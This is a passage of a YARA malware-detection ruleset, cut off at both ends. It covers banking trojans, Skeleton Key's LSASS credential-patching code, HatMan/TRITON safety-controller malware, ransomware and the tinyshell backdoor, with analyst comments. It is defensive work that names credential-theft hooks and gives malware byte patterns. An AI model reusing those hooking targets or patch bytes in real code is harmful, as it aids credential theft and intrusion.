    description = "Detects Shamoon 2.0 Disttrack Dropper"
    author = "Florian Roth"
    reference = "https://goo.gl/jKIfGB"
    date = "2016-12-01"
    score = 70
    hash1 = "4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6"
    hash2 = "5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a"
  strings:
    $a1 = "\\#{9A6DB7D2-FECF-41ff-9A92-6EDA696613DF}#" wide
    $a2 = "\\#{8A6DB7D2-FECF-41ff-9A92-6EDA696613DE}#" wide
    $s1 = "\\amd64\\elrawdsk.pdb" fullword ascii
    $s2 = "RawDiskSample.exe" fullword wide
    $s3 = "RawDisk Driver. Allows write access to files and raw disk sectors for user mode applications in Windows 2000 and later." fullword wide
    $s4 = "elrawdsk.sys" fullword wide
    $s5 = "\\DosDevices\\ElRawDisk" fullword wide
  condition:
    ( uint16(0) == 0x5a4d and filesize < 90KB and 1 of ($a*) and 1 of ($s*) )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Shifu banking trojan (2015-09 build): the PDB path alone is decisive; otherwise all four
// weaker strings are required, two of which are common goodware imports (see comments).
rule Shifu_Banking_Trojan_0 : banking
{
  meta:
    description = "Detects Shifu Banking Trojan"
    author = "Florian Roth"
    reference = "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/"
    date = "2015-09-01"
    hash1 = "4ff1ebea2096f318a2252ebe1726bcf3bbc295da9204b6c720b5bbf14de14bb2"
    hash2 = "4881c7d89c2b5e934d4741a653fbdaf87cc5e7571b68c723504069d519d8a737"
  strings:
    $x1 = "c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdb" fullword ascii
    $s1 = "listen above" fullword wide
    $s2 = "familycould cost" fullword wide
    $s3 = "SetSystemTimeAdjustment" fullword ascii /* Goodware String - occured 33 times */
    $s4 = "PeekNamedPipe" fullword ascii /* Goodware String - occured 347 times */
  condition:
    uint16(0) == 0x5a4d and filesize < 1000KB and ($x1 or all of ($s*))
}

// Shifu (2015-10 sample set): partial PDB path, or five of the six privilege/marker strings.
// No filesize bound here, unlike the rule above.
rule SHIFU_Banking_Trojan_1 : banking
{
  meta:
    description = "Detects SHIFU Banking Trojan"
    author = "Florian Roth"
    reference = "http://goo.gl/52n8WE"
    date = "2015-10-31"
    score = 70
    hash1 = "0066d1c8053ff8b0c07418c7f8d20e5cd64007bb850944269f611febd0c1afe0"
    hash2 = "3956d32a870d81be34cafc867769b2a2f55a96360070f1cb3d9addc2918357d5"
    hash3 = "3fde1b2b50fcb36a695f1e6bc577cd930c2343066d98982cf982393e55bfce0d"
    hash4 = "457ad4a4d4e675fe09f63873ca3364434dc872dde7d9b64ce7db919eaff47485"
    hash5 = "51edba913e8b83d1388b1be975957e439015289d51d3d5774d501551f220df6f"
    hash6 = "6611a2b79a3acf0003b1197aa5bfe488a33db69b663c79c6c5b023e86818d38b"
    hash7 = "72e239924faebf8209f8e3d093f264f778a55efb56b619f26cea73b1c4feb7a4"
    hash8 = "7a29cb641b9ac33d1bb405d364bc6e9c7ce3e218a8ff295b75ca0922cf418290"
    hash9 = "92fe4f9a87c796e993820d1bda8040aced36e316de67c9c0c5fc71aadc41e0f8"
    hash10 = "93ecb6bd7c76e1b66f8c176418e73e274e2c705986d4ac9ede9d25db4091ab05"
    hash11 = "a0b7fac69a4eb32953c16597da753b15060f6eba452d150109ff8aabc2c56123"
    hash12 = "a8b6e798116ce0b268e2c9afac61536b8722e86b958bd2ee95c6ecdec86130c9"
    hash13 = "d6244c1177b679b3d67f6cec34fe0ae87fba21998d4f5024d8eeaf15ca242503"
    hash14 = "dcc9c38e695ffd121e793c91ca611a4025a116321443297f710a47ce06afb36d"
  strings:
    $x1 = "\\Gather\\Dividerail.pdb" ascii
    $s0 = "\\payload\\payload.x86.pdb" ascii
    $s1 = "USER_PRIV_GUEST" fullword wide
    $s2 = "USER_PRIV_ADMIN" fullword wide
    $s3 = "USER_PRIV_USER" fullword wide
    $s4 = "PPSWVPP" fullword ascii
    $s5 = "WinSCard.dll" fullword ascii /* Goodware String - occured 83 times */
  condition:
    uint16(0) == 0x5a4d and ($x1 or 5 of ($s*))
}

// Shifu (McAfee): two API names plus three UTF-16LE byte sequences. Decoded, $c is
// `/c start "" "%s" %s` NUL NUL `cmd.exe` NUL `run`, $d is "SndVol.exe" and $e is
// "RedirectEXE" (kept as hex because $c spans embedded NULs). All five are required.
rule Shifu : banking
{
  meta:
    reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/"
    author = "McAfee Labs"
  strings:
    $b = "RegCreateKeyA"
    $a = "CryptCreateHash"
    $c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E}
    $d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65}
    $e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45}
  condition:
    all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Skeleton Key patcher tool (Dell SecureWorks CTU): the in-memory LSASS patcher carries the
// target process name, the two DLLs it patches, its own DLL name and the three exported
// function names it hooks. Every string is required. Hunting note: this tool runs on domain
// controllers; a hit on disk or in an LSASS dump warrants a full DC compromise review.
rule skeleton_key_patcher
{
  meta:
    description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
    author = "Dell SecureWorks Counter Threat Unit"
    reference = "http://goo.gl/aAk3lN"
    date = "2015/01/13"
    score = 70
  strings:
    $target_process = "lsass.exe" wide
    $dll1 = "cryptdll.dll"
    $dll2 = "samsrv.dll"
    $name = "HookDC.dll"
    $patched1 = "CDLocateCSystem"
    $patched2 = "SamIRetrievePrimaryCredentials"
    $patched3 = "SamIRetrieveMultiplePrimaryCredentials"
  condition:
    all of them
}

// Skeleton Key: the injected stub and the three replacement function bodies as they appear
// in LSASS memory, so this rule is meant for memory images rather than files. The two
// SamIRetrieve* patches appear to compare a counted wide string (length 0x26) against fixed
// characters before returning what looks like an NTSTATUS (B8 A1 02 00 C0); confirm against
// the referenced report before relying on that reading. One pattern is enough to match.
rule skeleton_key_injected_code
{
  meta:
    description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
    author = "Dell SecureWorks Counter Threat Unit"
    reference = "http://goo.gl/aAk3lN"
    date = "2015/01/13"
    score = 70
  strings:
    $injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
    $patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
    $patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
    $patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
  condition:
    any of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Spora ransomware: two long byte sequences, both required. No header or size gate.
rule Spora
{
  meta:
    author = "pekeinfo"
    date = "2017-02-22"
    description = "Spora"
  strings:
    $a = {7B 7F 4E 11 5D F3 FE 15 F9 55 FD 00 AD E9 CF FE E2 56 78 03 D0 21 46 00 30 68 C4 D0 01 FD 00 C3 B7 00 4A 0D 57 D2 52 91 05}
    $b = {6F 51 3E 6B F9 15 29 D9 DF 26 1E 80 62 8A 0D E3 64 51 3B 0F F3 FE FF FF F3 FE FF FF F3 FE FF FF F3 FE FF FF}
  condition:
    $a and $b
}

// Packer seen on Spora and Cerber exploit-kit payloads: a packer hit, not a family verdict.
rule unk_packer
{
  meta:
    author = "pekeinfo"
    date = "2017-02-22"
    description = "Spora & Cerber ek"
  strings:
    $a = {0E 9E 52 69 C8 E4 73 BF 87 2B 95 15 33 1B B7 6B 46 62 D8 C1 01 A9 F9 17 FC EF 1A 6E B7 36 3C C4 72 7D 5D 1A 2D C4 7E 70 E8 0A A0 C6 A3 51 C1 1C 5E 98 E2 72 19 DF 03 C9 D4 25 25 1F EF 6B 46 75 9C BB 1D D2 57 56 35 75 31 35 56 8F B7 5B 23 3D }
    $b = {00 10 00 2E E8 77 EC FF FF 85 C0 0F 85 78 C4 FF}
  condition:
    $a and $b
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Forensic carving helper, not a malware rule: the bytes are "SQLite format 3\0", the
// 16-byte header every SQLite 3 database file starts with.
rule with_sqlite : sqlite
{
  meta:
    author = "Julian J. Gonzalez <info@seguridadparatodos.es>"
    reference = "http://www.st2labs.com"
    description = "Rule to detect the presence of SQLite data in raw image"
  strings:
    $hex_string = {53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00}
  condition:
    all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// "pe" is imported twice in this stretch; none of the rules below use the pe module.
import "pe"

// Universal 1337 Stealer server component. The hex strings are plain ASCII markers
// (decoded in the trailing comments). YARA's `and` binds tighter than `or`, so the
// condition reads as (sig1 and sig2) or (sig3 and sig4): either the [S-P-L-I-T]/[H-E-R-E]
// pair or the FTP~/~1~1~0~0 pair is enough. The second pair is short and generic
// enough that hits on it alone deserve a second look.
rule universal_1337_stealer_serveur : Stealer
{
    meta:
        author="Kevin Falcoz"
        date="24/02/2013"
        description="Universal 1337 Stealer Serveur"
    strings:
        $signature1={2A 5B 53 2D 50 2D 4C 2D 49 2D 54 5D 2A} /*[S-P-L-I-T]*/
        $signature2={2A 5B 48 2D 45 2D 52 2D 45 5D 2A} /*[H-E-R-E]*/
        $signature3={46 54 50 7E} /*FTP~*/
        $signature4={7E 31 7E 31 7E 30 7E 30} /*~1~1~0~0*/
    condition:
        $signature1 and $signature2 or $signature3 and $signature4
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Surtr family (Citizen Lab). The private rules below are building blocks only; they
// never fire on their own and are combined by GmRemote / Remote / Surtr further down.

// Strings common to both stage-2 variants (remote.dll and gmremote). All UTF-16LE.
private rule RSharedStrings : Surtr Family
{
    meta:
        description = "identifiers for remote and gmremote"
        author = "Katie Kleemola"
        last_updated = "07-21-2014"
    strings:
        $ = "nView_DiskLoydb" wide
        $ = "nView_KeyLoydb" wide
        $ = "nView_skins" wide
        $ = "UsbLoydb" wide
        $ = "%sBurn%s" wide
        $ = "soul" wide
    condition:
        any of them
}

// remote.dll indicators. The leading/trailing \x00 anchors each name as a complete
// NUL-terminated string rather than a substring of a longer identifier.
private rule RemoteStrings : Remote Variant Surtr Family
{
    meta:
        description = "indicators for remote.dll - surtr stage 2"
        author = "Katie Kleemola"
        last_updated = "07-21-2014"
    strings:
        $ = "\x00Remote.dll\x00"
        $ = "\x00CGm_PlugBase::"
        $ = "\x00ServiceMain\x00_K_H_K_UH\x00"
        $ = "\x00_Remote_\x00" wide
    condition:
        any of them
}

// gmremote indicators: export names, a build-path PDB string and the work-file name.
private rule GmRemoteStrings : GmRemote Variant Family Surtr
{
    meta:
        description = "identifiers for gmremote: surtr stage 2"
        author = "Katie Kleemola"
        last_updated = "07-21-2014"
    strings:
        $ = "\x00x86_GmRemote.dll\x00"
        $ = "\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00"
        $ = "\x00GmShutPoint\x00"
        $ = "\x00GmRecvPoint\x00"
        $ = "\x00GmInitPoint\x00"
        $ = "\x00GmVerPoint\x00"
        $ = "\x00GmNumPoint\x00"
        $ = "_Gt_Remote_" wide
        $ = "%sBurn\\workdll.tmp" wide
    condition:
        any of them
}

// Public rule: requires one shared string AND one gmremote-specific string.
rule GmRemote : Family Surtr Variant GmRemote
{
    meta:
        description = "identifier for gmremote"
        author = "Katie Kleemola"
        last_updated = "07-25-2014"
    condition:
        RSharedStrings and GmRemoteStrings
}

// Public rule: requires one shared string AND one remote.dll-specific string.
rule Remote : Family Surtr Variant Remote
{
    meta:
        description = "identifier for remote"
        author = "Katie Kleemola"
        last_updated = "07-25-2014"
    condition:
        RSharedStrings and RemoteStrings
}

// Stage-1 strings. "Prod.t" / "Proe.t" / "Burn\\" are short; any single hit fires,
// so this is intentionally broad and relies on the private-rule tagging for triage.
rule SurtrStrings : Surtr Family
{
    meta:
        author = "Katie Kleemola"
        description = "Strings for Surtr"
        last_updated = "2014-07-16"
    strings:
        $ = "\x00soul\x00"
        $ = "\x00InstallDll.dll\x00"
        $ = "\x00_One.dll\x00"
        $ = "_Fra.dll"
        $ = "CrtRunTime.log"
        $ = "Prod.t"
        $ = "Proe.t"
        $ = "Burn\\"
        $ = "LiveUpdata_Mem\\"
    condition:
        any of them
}

// Stage-1 code features. The `C6 [3] xx` sequences are byte-wise MOV imm8 stores that
// spell out a string one character at a time (a stack-string build): the immediates
// in the second pattern are 'B','u','r','n','\\' and in the third '_','F','i','r','e','.','d'.
rule SurtrCode : Surtr Family
{
    meta:
        author = "Katie Kleemola"
        description = "Code features for Surtr Stage1"
        last_updated = "2014-07-16"
    strings:
        //decrypt config
        $ = { 8A ?? ?? 84 ?? ?? 74 ?? 3C 01 74 ?? 34 01 88 41 3B ?? 72 ?? }
        //if Burn folder name is not in strings
        $ = { C6 [3] 42 C6 [3] 75 C6 [3] 72 C6 [3] 6E C6 [3] 5C }
        //mov char in _Fire
        $ = { C6 [3] 5F C6 [3] 46 C6 [3] 69 C6 [3] 72 C6 [3] 65 C6 [3] 2E C6 [3] 64 }
    condition:
        any of them
}

// Stage-1 umbrella rule: strings OR code features.
rule Surtr : Family
{
    meta:
        author = "Katie Kleemola"
        description = "Rule for Surtr Stage One"
        last_updated = "2014-07-16"
    condition:
        SurtrStrings or SurtrCode
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// "pe" is imported but unused by the T5000 rules.
import "pe"

// T5000 (Citizen Lab): temp-script names, COM-style GUIDs, and several PDB build paths.
// Any single string fires; the GUIDs and PDB paths are the high-confidence ones, the
// two .vbs names are weaker on their own.
rule T5000Strings : T5000 Family
{
    meta:
        description = "T5000 Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-26"
    strings:
        $ = "_tmpR.vbs"
        $ = "_tmpg.vbs"
        $ = "Dtl.dat" wide ascii
        $ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E"
        $ = "EED5CA6C-9958-4611-B7A7-1238F2E1B17E"
        $ = "8A8FF8AD-D1DE-4cef-B87C-82627677662E"
        $ = "43EE34A9-9063-4d2c-AACD-F5C62B849089"
        $ = "A8859547-C62D-4e8b-A82D-BE1479C684C9"
        $ = "A59CF429-D0DD-4207-88A1-04090680F714"
        $ = "utd_CE31" wide ascii
        $ = "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb"
        $ = "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb"
        $ = "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb"
        $ = "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb"
    condition:
        any of them
}

// Family wrapper; currently only the string rule feeds it.
rule T5000 : Family
{
    meta:
        description = "T5000"
        author = "Seth Hardy"
        last_modified = "2014-06-26"
    condition:
        T5000Strings
}

/*
 * DESCRIPTION: Yara rules to match the known binary components of the HatMan
 * malware targeting Triconex safety controllers. Any matching
 * components should hit using the "hatman" rule in addition to a
 * more specific "hatman_*" rule.
 * AUTHOR: DHS/NCCIC/ICS-CERT
 */

/* Private rules that are used at the end in the public rules. */

// The controller code is PowerPC. Where a pattern has a _be and a _le twin, the _le
// form is the same 32-bit words with each word's bytes reversed, so the same
// instructions are caught in either byte order. `4e 80 00 20` is PowerPC `blr`.

// Status-setting fragment; the ?? bytes mask branch displacements that vary per build.
private rule hatman_setstatus : hatman
{
    strings:
        $preset = { 80 00 40 3c 00 00 62 80 40 00 80 3c 40 20 03 7c ?? ?? 82 40 04 00 62 80 60 00 80 3c 40 20 03 7c ?? ?? 82 40 ?? ?? 42 38 }
    condition:
        $preset
}

// Byte-copy loop (mtctr / lbzu / stbu / bdnz / blr) in both byte orders.
private rule hatman_memcpy : hatman
{
    strings:
        $memcpy_be = { 7c a9 03 a6 38 84 ff ff 38 63 ff ff 8c a4 00 01 9c a3 00 01 42 00 ff f8 4e 80 00 20 }
        $memcpy_le = { a6 03 a9 7c ff ff 84 38 ff ff 63 38 01 00 a4 8c 01 00 a3 9c f8 ff 00 42 20 00 80 4e }
    condition:
        $memcpy_be or $memcpy_le
}

// Two little-endian 32-bit constants (0x0056789a and 0x00001234); both required.
// On their own these are weak, which is why the public rules never use this alone.
private rule hatman_dividers : hatman
{
    strings:
        $div1 = { 9a 78 56 00 }
        $div2 = { 34 12 00 00 }
    condition:
        $div1 and $div2
}

// Tiny stub: li r3,-1 ; sc ; blr (little-endian word order).
private rule hatman_nullsub : hatman
{
    strings:
        $nullsub = { ff ff 60 38 02 00 00 44 20 00 80 4e }
    condition:
        $nullsub
}

// Loads a fixed address (lis/ori pair) then returns; both byte orders.
private rule hatman_origaddr : hatman
{
    strings:
        $oaddr_be = { 3c 60 00 03 60 63 96 f4 4e 80 00 20 }
        $oaddr_le = { 03 00 60 3c f4 96 63 60 20 00 80 4e }
    condition:
        $oaddr_be or $oaddr_le
}

// Loads a fixed address into CTR and branches to it (bctr); both byte orders.
private rule hatman_origcode : hatman
{
    strings:
        $ocode_be = { 3c 00 00 03 60 00 a0 b0 7c 09 03 a6 4e 80 04 20 }
        $ocode_le = { 03 00 00 3c b0 a0 00 60 a6 03 09 7c 20 04 80 4e }
    condition:
        $ocode_be or $ocode_le
}

// mfmsr r3 / mtmsr r3 — reading and writing the Machine State Register, i.e. code
// that manipulates supervisor state. Requires both instructions in the same byte order.
private rule hatman_mftmsr : hatman
{
    strings:
        $mfmsr_be = { 7c 63 00 a6 }
        $mfmsr_le = { a6 00 63 7c }
        $mtmsr_be = { 7c 63 01 24 }
        $mtmsr_le = { 24 01 63 7c }
    condition:
        ($mfmsr_be and $mtmsr_be) or ($mfmsr_le and $mtmsr_le)
}

// Load-offset check sequence; ?? mask branch targets and a call displacement.
private rule hatman_loadoff : hatman
{
    strings:
        $loadoff_be = { 80 60 00 04 48 00 ?? ?? 70 60 ff ff 28 00 00 00 40 82 ?? ?? 28 03 00 00 41 82 ?? ?? }
        $loadoff_le = { 04 00 60 80 ?? ?? 00 48 ff ff 60 70 00 00 00 28 ?? ?? 82 40 00 00 03 28 ?? ?? 82 41 }
    condition:
        $loadoff_be or $loadoff_le
}

// Injector = memcpy + fixed original address + load-offset check.
private rule hatman_injector_int : hatman
{
    condition:
        hatman_memcpy and hatman_origaddr and hatman_loadoff
}

// Payload = memcpy + branch-to-original-code + MSR manipulation.
private rule hatman_payload_int : hatman
{
    condition:
        hatman_memcpy and hatman_origcode and hatman_mftmsr
}

/* Actual public rules to match using the private rules.
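*/

// Each public HatMan rule is capped at 100KB; the components are small controller
// binaries, and the cap keeps the short private patterns from firing on large files.

// Compiled Python component: the nullsub stub, the status fragment and both divider
// constants must all be present.
rule hatman_compiled_python : hatman
{
    condition:
        filesize < 100KB and hatman_nullsub and hatman_setstatus and hatman_dividers
}

// Injector-only component (explicitly excludes payload features).
rule hatman_injector : hatman
{
    condition:
        filesize < 100KB and hatman_injector_int and not hatman_payload_int
}

// Payload-only component (explicitly excludes injector features).
rule hatman_payload : hatman
{
    condition:
        filesize < 100KB and hatman_payload_int and not hatman_injector_int
}

// Single file carrying injector and payload together, plus the divider constants.
rule hatman_combined : hatman
{
    condition:
        filesize < 100KB and hatman_injector_int and hatman_payload_int and hatman_dividers
}

// Umbrella rule: fires alongside whichever specific rule matched. The size cap is
// applied to the whole alternation; the previous unparenthesized form only bound it
// to hatman_compiled_python (the other three carry their own cap, so matching is
// unchanged, but the intent is now explicit).
rule hatman : hatman
{
    meta:
        author = "DHS/NCCIC/ICS-CERT"
        description = "Matches the known samples of the HatMan malware."
    condition:
        filesize < 100KB and (hatman_compiled_python or hatman_injector or hatman_payload or hatman_combined)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// TRITON / TRISIS attack framework: Python module/class names, TriStation protocol
// vocabulary, CRC helper names and the two injected-binary file names. Needs two
// generic Python markers plus seven framework-specific strings, under 3MB.
rule TRITON_ICS_FRAMEWORK
{
    meta:
        author = "nicholas.carr @itsreallynick"
        md5 = "0face841f7b2953e7c29c064d6886523"
        description = "TRITON framework recovered during Mandiant ICS incident response"
    strings:
        // Generic Python artefacts (compiled bytecode, module markers, imports)
        $python_compiled = ".pyc" nocase ascii wide
        $python_module_01 = "__module__" nocase ascii wide
        $python_module_02 = "<module>" nocase ascii wide
        $python_script_01 = "import Ts" nocase ascii wide
        $python_script_02 = "def ts_" nocase ascii wide
        // TS_cnames.py: TriStation / Tricon constant names
        $py_cnames_01 = "TS_cnames.py" nocase ascii wide
        $py_cnames_02 = "TRICON" nocase ascii wide
        $py_cnames_03 = "TriStation " nocase ascii wide
        $py_cnames_04 = " chassis " nocase ascii wide
        // Shared library vocabulary
        $py_tslibs_01 = "GetCpStatus" nocase ascii wide
        $py_tslibs_02 = "ts_" ascii wide
        $py_tslibs_03 = " sequence" nocase ascii wide
        // "import TsHi/TsLow/TsBase" followed by a non-letter, so "import TsHigh"
        // does not match. Was `[^:alpha:]`, which YARA reads as a plain negated
        // class of the five characters ':' 'a' 'l' 'p' 'h', not as a POSIX class.
        $py_tslibs_04 = /import Ts(Hi|Low|Base)[^a-zA-Z]/ nocase ascii wide
        $py_tslibs_05 = /module\s?version/ nocase ascii wide
        $py_tslibs_06 = "bad " nocase ascii wide
        $py_tslibs_07 = "prog_cnt" nocase ascii wide
        // TsBase.py
        $py_tsbase_01 = "TsBase.py" nocase ascii wide
        $py_tsbase_02 = ".TsBase(" nocase ascii wide
        // TsHi.py (high-level program manipulation)
        $py_tshi_01 = "TsHi.py" nocase ascii wide
        $py_tshi_02 = "keystate" nocase ascii wide
        $py_tshi_03 = "GetProjectInfo" nocase ascii wide
        $py_tshi_04 = "GetProgramTable" nocase ascii wide
        $py_tshi_05 = "SafeAppendProgramMod" nocase ascii wide
        $py_tshi_06 = ".TsHi(" ascii nocase wide
        // TsLow.py (low-level TriStation protocol)
        $py_tslow_01 = "TsLow.py" nocase ascii wide
        $py_tslow_02 = "print_last_error" ascii nocase wide
        $py_tslow_03 = ".TsLow(" ascii nocase wide
        $py_tslow_04 = "tcm_" ascii wide
        $py_tslow_05 = " TCM found" nocase ascii wide
        // crc.pyc helper
        $py_crc_01 = "crc.pyc" nocase ascii wide
        $py_crc_02 = "CRC16_MODBUS" ascii wide
        $py_crc_03 = "Kotov Alaxander" nocase ascii wide
        $py_crc_04 = "CRC_CCITT_XMODEM" ascii wide
        $py_crc_05 = "crc16ret" ascii wide
        $py_crc_06 = "CRC16_CCITT_x1D0F" ascii wide
        $py_crc_07 = /CRC16_CCITT[^_]/ ascii wide
        // sh.pyc and assorted keywords
        $py_sh_01 = "sh.pyc" nocase ascii wide
        $py_keyword_01 = " FAILURE" ascii wide
        $py_keyword_02 = "symbol table" nocase ascii wide
        // Injected PowerPC binaries delivered by the framework
        $py_TRIDENT_01 = "inject.bin" ascii nocase wide
        $py_TRIDENT_02 = "imain.bin" ascii nocase wide
    condition:
        2 of ($python_*) and 7 of ($py_*) and filesize < 3MB
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Tedroo spambot: the two hex strings are ASCII "%s%s.exe" and "_log.txt". Both are
// generic format/file-name fragments, so expect some benign hits and confirm context.
rule Tedroo : Spammer
{
    meta:
        author="Kevin Falcoz"
        date="22/11/2015"
        description="Tedroo Spammer"
    strings:
        $signature1={25 73 25 73 2E 65 78 65}
        $signature2={5F 6C 6F 67 2E 74 78 74}
    condition:
        $signature1 and $signature2
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.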
*/

// Tinba 2 (DGA variant), memory rule: eight API/function names (all required), the
// PEM public-key marker and one code fragment. The API names cover process and file
// mapping, URL cache and NSS PR_Read/PR_Write hooks; together with $pubkey they are
// specific enough, but none would be on its own.
rule Tinba2 : banking
{
    meta:
        author = "n3sfox <n3sfox@gmail.com>"
        date = "2015/11/07"
        description = "Tinba 2 (DGA) banking trojan"
        reference = "https://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world"
        filetype = "memory"
        hash1 = "c7f662594f07776ab047b322150f6ed0"
        hash2 = "dc71ef1e55f1ddb36b3c41b1b95ae586"
        hash3 = "b788155cb82a7600f2ed1965cffc1e88"
    strings:
        $str1 = "MapViewOfFile"
        $str2 = "OpenFileMapping"
        $str3 = "NtCreateUserProcess"
        $str4 = "NtQueryDirectoryFile"
        $str5 = "RtlCreateUserThread"
        $str6 = "DeleteUrlCacheEntry"
        $str7 = "PR_Read"
        $str8 = "PR_Write"
        $pubkey = "BEGIN PUBLIC KEY"
        // `??` masks the push imm8 operand before the call
        $code1 = {50 87 44 24 04 6A ?? E8}
    condition:
        all of ($str*) and $pubkey and $code1
}

/*
Description: Detects ELF or MachO tinyshell backdoor on static, dynamic binary form.
It is commonly used as backdoor in Linux, FreeBSD or MacOSX operating systems.
This rule by default is NOT designed to scan the CNC client side.
Category: ELF or MachO, backdoor, hacktool, RAT, shell
License: This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
Version 1-20180211, author:unixfreaxjp
*/

// Mach-O magic check. Covers the 32-bit and 64-bit magics in both byte orders
// (feedface/cefaedfe, feedfacf/cffaedfe) and the fat-binary magic (cafebabe/bebafeca).
// Note 0xcafebabe is also the Java class-file magic, so the "is__osx" name is a
// slight overstatement; the rules below combine it with content strings anyway.
// `is__elf` used below is a private rule defined earlier in this ruleset.
private rule is__osx
{
    meta:
        date = "2018-02-12"
        author = "@unixfreaxjp"
    condition:
        uint32(0) == 0xfeedface or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe
}

// Usage strings of the tinyshell server binary. $vara01 is ASCII "s:p:" + NUL, which is
// consistent with the "-s secret" / "-p port" options in the usage text. All required.
private rule priv01
{
    meta:
        date = "2018-02-11"
        author = "@unixfreaxjp"
    strings:
        $vara01 = { 73 3A 70 3A 00 }
        $vara02 = "Usage: %s" fullword nocase wide ascii
        $vara03 = "[ -s secret ]" fullword nocase wide ascii
        $vara04 = "[ -p port ]" fullword nocase wide ascii
    condition:
        all of them
}

// x86-64 prologue fragments: $varb* from one build style, $vard* from another
// (push rbp / mov rbp,rsp first). Two from the same group are required.
private rule priv03
{
    meta:
        date = "2018-02-10"
        author = "@unixfreaxjp"
    strings:
        $varb01 = { 41 57 41 56 41 55 41 54 55 53 0F B6 06 }
        $varb02 = { 48 C7 07 00 00 00 00 48 C7 47 08 00 00 }
        $vard01 = { 55 48 89 E5 41 57 41 56 41 55 41 54 53 }
        $vard02 = { 55 48 89 E5 48 C7 47 08 00 00 00 00 48 } // can be added
    condition:
        (2 of ($varb*)) or (2 of ($vard*))
}

// Two short code fragments; either one suffices. The E8 FB A4 FF FF in $varb03 is a
// fixed relative call displacement, so this is tied to one particular build.
private rule priv04
{
    meta:
        date = "2018-02-11"
        author = "@unixfreaxjp"
    strings:
        $varb03 = { 89 DF E8 FB A4 FF FF 83 C3 01 81 FB 00 04 }
